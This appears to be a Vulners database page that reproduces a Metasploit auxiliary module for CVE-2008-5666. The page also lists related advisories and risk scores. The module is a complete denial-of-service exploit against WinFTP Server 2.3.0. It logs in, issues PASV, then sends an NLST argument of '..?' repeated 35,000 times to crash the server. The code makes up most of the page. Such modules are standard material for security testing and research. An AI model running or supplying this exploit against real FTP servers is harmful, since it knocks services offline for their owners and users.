Lucene search

K

WinFTP 2.3.0 NLST Denial of Service

🗓️ 30 Sep 2008 23:24:28Reported by kris katterjohn <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

WinFTP 2.3.0 NLST Denial of Service. Rough port of Julien Bedard's PoC, requiring valid login. Even anonymous can call NLST

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2008-5666
19 Dec 200801:52
nvd
OpenVAS
WinFTP Server <= 2.3.0 PASV Command DoS Vulnerability
26 Dec 200800:00
openvas
OpenVAS
WinFTP Server PASV Command Denial of Service Vulnerability
26 Dec 200800:00
openvas
Packet Storm
WinFTP 2.3.0 NLST Denial of Service
31 Aug 202400:00
packetstorm
Prion
Command injection
19 Dec 200801:52
prion
Check Point Advisories
WinFTP Server NLST Command Denial of Service (CVE-2008-5666)
1 Dec 201400:00
checkpoint_advisories
CVE
CVE-2008-5666
19 Dec 200801:52
cve
Cvelist
CVE-2008-5666
18 Dec 200821:00
cvelist
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WinFTP 2.3.0 NLST Denial of Service',
      'Description'    => %q{
        This module is a very rough port of Julien Bedard's
        PoC.  You need a valid login, but even anonymous can
        do it if it has permission to call NLST.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-5666' ],
          [ 'OSVDB', '49043' ],
          [ 'EDB', '6581' ]
        ],
      'DisclosureDate' => '2008-09-26'))
  end

  def run
    return unless connect_login

    # NLST has to follow a PORT or PASV
    resp = send_cmd(['PASV'])

    raw_send("NLST #{'..?' * 35000}\r\n")

    disconnect
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Sep 2008 23:28Current
10High risk
Vulners AI Score10
CVSS23.5
EPSS0.181
17
.json
Report